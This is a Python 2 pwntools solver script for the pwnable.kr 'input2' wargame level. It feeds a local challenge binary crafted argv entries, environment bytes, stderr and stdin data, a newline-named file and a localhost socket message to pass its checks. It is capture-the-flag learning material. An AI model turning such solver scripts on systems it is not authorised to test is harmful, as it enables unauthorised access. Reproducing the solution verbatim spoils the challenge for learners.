exploit code
# -*- coding: utf-8 -*-
"""Solver for the pwnable.kr "input2" wargame level.

The target binary is started locally with a crafted argument vector,
environment and stderr stream, then fed further input over stdin, a file
and a TCP connection. Each stageN() helper prepares one of those inputs.

Notes for anyone re-running this:
  * Written for Python 2: escapes such as "\\xde" are single raw bytes only
    under Python 2 str semantics. Under Python 3 they become text code
    points and would need bytes literals instead.
  * stage2() and stage4() create files in the current working directory,
    so run the script from a scratch directory you own.
  * The port is fixed at 8080 on localhost; on a shared host another
    listener on that port would collide with the target (assumption,
    confirm on the box).
"""
from pwn import *

# TCP port passed to the target in argv[67] and dialled again by stage5().
port = "8080"


def stage1():
    """Return the argument vector: program path plus 99 extra arguments."""
    argv = ['/home/input2/input'] + [str(n) for n in range(99)]
    # 65, 66 and 67 are ord('A'), ord('B') and ord('C'); presumably the target
    # indexes argv by those characters -- confirm against the challenge source.
    argv[65] = "\x00"
    argv[66] = "\x20\x0a\x0d"
    argv[67] = port  # consumed by the network stage (stage5)
    return argv


def stage2():
    """Write four bytes to a file named "stderr" and return it opened for reading.

    The returned handle is given to the child as its stderr stream, so the
    child can read these bytes back from that descriptor.
    """
    with open("stderr", "w") as sink:
        sink.write("\x00\x0a\x02\xff")
    # NOTE(review): this handle is never closed by the script; it lives until
    # the interpreter exits.
    return open("stderr", "r")


def stage3():
    """Return the environment mapping handed to the child process."""
    return {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}


def stage4():
    """Create a file whose name is a single newline byte, holding four NULs."""
    with open("\x0a", "w") as sink:
        sink.write("\x00\x00\x00\x00")


def stage5():
    """Connect to the port from argv[67] on localhost and send four bytes."""
    conn = remote("localhost", int(port))
    conn.sendline("\xde\xad\xbe\xef")
    conn.close()


def main():
    """Run the stages in order against a freshly spawned target process."""
    # Argv, environment and stderr must be in place before the child starts.
    target = process(stage1(), env=stage3(), stderr=stage2())
    print(target.recv(1024))

    # stdin half of stage 2 (the stderr half was prepared by stage2()).
    target.sendline("\x00\x0a\x00\xff")
    # NOTE(review): '' lands on recvline's first positional parameter
    # (keepends in pwntools), so this likely drops the newline -- confirm.
    print(target.recvline(''))

    # The file has to exist before the target reaches its file check.
    stage4()
    print(target.recv(1024))

    # The target is expected to be listening on `port` by now.
    stage5()
    target.interactive()
    target.close()


if __name__ == "__main__":
    main()